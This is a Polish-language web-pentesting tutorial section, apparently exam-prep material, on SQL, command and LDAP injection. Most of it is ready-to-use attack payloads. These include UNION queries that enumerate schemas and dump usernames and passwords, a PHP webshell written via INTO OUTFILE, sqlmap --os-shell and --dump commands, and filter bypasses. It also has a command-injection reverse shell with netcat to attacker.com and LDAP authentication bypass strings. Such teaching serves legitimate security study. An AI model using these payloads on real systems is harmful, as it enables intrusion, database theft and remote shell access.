Injection Attacks (SQL Injection, Command Injection, LDAP Injection)
Ataki typu Injection polegają na wstrzyknięciu złośliwego kodu do aplikacji webowej w celu manipulacji danymi lub wykonania nieautoryzowanych poleceń. W tej sekcji omówimy najczęściej spotykane rodzaje ataków: SQL Injection, Command Injection oraz LDAP Injection.
SQL Injection
SQL Injection (SQLi) polega na manipulacji zapytaniami SQL w celu uzyskania nieautoryzowanego dostępu do bazy danych.
🔬 Ręczny SQL Injection (UNION-based)
Automatyczne narzędzia jak sqlmap bywają zablokowane przez WAF lub zbyt hałaśliwe. Ręczne techniki są niezbędne na egzaminach OSCP/eWPTX i pozwalają w pełni zrozumieć podatność.
1️⃣ Ustalenie liczby kolumn
Zwiększaj liczbę kolumn w ORDER BY aż do błędu — poprzednia liczba to liczba kolumn:
' ORDER BY 1 --
' ORDER BY 2 --
' ORDER BY 3 -- ← błąd → 2 kolumny
Alternatywnie przez UNION NULL:
' UNION SELECT NULL --
' UNION SELECT NULL,NULL --
' UNION SELECT NULL,NULL,NULL --
2️⃣ Identyfikacja widocznych kolumn i wersji bazy
Gdy znasz liczbę kolumn, sprawdź które są renderowane w odpowiedzi:
' UNION SELECT 1,2 --
' UNION SELECT 'a',NULL --
' UNION SELECT NULL,'a' --
Wydobądź wersję i użytkownika bazy:
' UNION SELECT VERSION(),user() --
' UNION SELECT @@version,@@datadir --
3️⃣ Enumeracja baz, tabel i kolumn przez information_schema
Dostępne bazy danych:
' UNION SELECT schema_name,NULL FROM information_schema.SCHEMATA --
Tabele w wybranej bazie:
' UNION SELECT table_name,NULL FROM information_schema.TABLES WHERE table_schema='mydb' --
Kolumny w tabeli users:
' UNION SELECT column_name,NULL FROM information_schema.COLUMNS WHERE table_name='users' --
Dump danych:
' UNION SELECT username,password FROM users --
4️⃣ Zapis webshella przez INTO OUTFILE
Jeśli baza działa na tym samym serwerze co web root i użytkownik MySQL ma uprawnienia FILE:
' UNION SELECT "<?php echo shell_exec($_GET['cmd']); ?>",NULL INTO OUTFILE '/var/www/html/shell.php' --
Weryfikacja dostępu:
curl "http://example.com/shell.php?cmd=id"
Wymaga:
FILEprivilege w MySQL, katalog web root zapisywalny dla procesu MySQL, braksecure_file_priv.
5️⃣ sqlmap –os-shell
Gdy ręczny test potwierdził podatność i uprawnienia FILE, sqlmap może przejąć shell:
sqlmap -u "http://example.com/index.php?id=1" --os-shell
sqlmap automatycznie wgra webshell i uruchomi interaktywną konsolę. Opcja --web-root wskazuje ścieżkę jeśli autodetekcja zawodzi:
sqlmap -u "http://example.com/index.php?id=1" --os-shell --web-root="/var/www/html"
6️⃣ Wykorzystanie sqlmap
sqlmap to narzędzie automatyzujące wykrywanie i eksploatację SQL Injection.
Podstawowe skanowanie
sqlmap -u "http://example.com/index.php?id=1" --dbs
Opcje:
--dbs– wyświetla dostępne bazy danych--tables– wyświetla tabele danej bazy danych--columns– wyświetla kolumny w tabeli
Eksfiltracja danych
sqlmap -u "http://example.com/index.php?id=1" -D mydb -T users --dump
Wyciąga wszystkie rekordy z tabeli users.
Wykorzystanie sesji i cookies
Jeżeli aplikacja wymaga autoryzacji:
sqlmap -u "http://example.com/profile.php?id=5" --cookie="PHPSESSID=xyz123" --dbs
🚀 Bypassowanie filtrów
Wiele aplikacji stosuje mechanizmy obronne, ale można je obejść stosując różne techniki:
1️⃣ Użycie znaków zastępczych
?id=1' OR '1'='1
2️⃣ Zmiana kodowania
W niektórych przypadkach można ominąć filtry poprzez enkodowanie znaków:
?id=1%27%20OR%20%271%27%3D%271
3️⃣ SQL Injection w JSON/API
Jeśli aplikacja komunikuje się przez API:
{"user": "admin' OR '1'='1", "password": "test"}
🔎 Blind SQLi i czasowe ataki
Jeżeli aplikacja nie zwraca błędów SQL, można wykorzystać Blind SQL Injection.
1️⃣ Boolean-based Blind SQLi
Sprawdzenie, czy aplikacja zwraca różne wyniki dla TRUE/FALSE:
?id=1' AND 1=1 --
?id=1' AND 1=2 --
Jeżeli pierwszy zwraca dane, a drugi nie – aplikacja jest podatna.
2️⃣ Time-based Blind SQLi
Jeśli aplikacja nie zwraca żadnych danych, można sprawdzić podatność przez opóźnienia:
?id=1' AND SLEEP(5) --
Jeśli serwer odpowiada z opóźnieniem, to aplikacja jest podatna na SQLi.
W sqlmap:
sqlmap -u "http://example.com/index.php?id=1" --technique=T
Command Injection
Command Injection pozwala na wykonanie poleceń systemowych poprzez podatną aplikację.
1️⃣ Wykrywanie podatności
Podstawowe payloady:
http://example.com/ping.php?host=127.0.0.1; id
http://example.com/ping.php?host=127.0.0.1 && whoami
2️⃣ Eksploatacja
Przykładowe wykorzystanie:
?host=127.0.0.1 | nc -e /bin/bash attacker.com 4444
LDAP Injection
LDAP Injection jest atakiem na systemy uwierzytelniania oparte na LDAP.
1️⃣ Przykład podatnego zapytania
(&(user=admin)(password=mypassword))
Można go obejść poprzez:
admin)(&))(
2️⃣ LDAP Injection payloads
*)(&)– bypassowanie autoryzacji*– wyszukiwanie wszystkich użytkowników
Ataki Injection są jednymi z najczęściej wykorzystywanych podatności w aplikacjach webowych. Kolejnym krokiem będzie analiza podatności związanych z Broken Authentication & Session Management.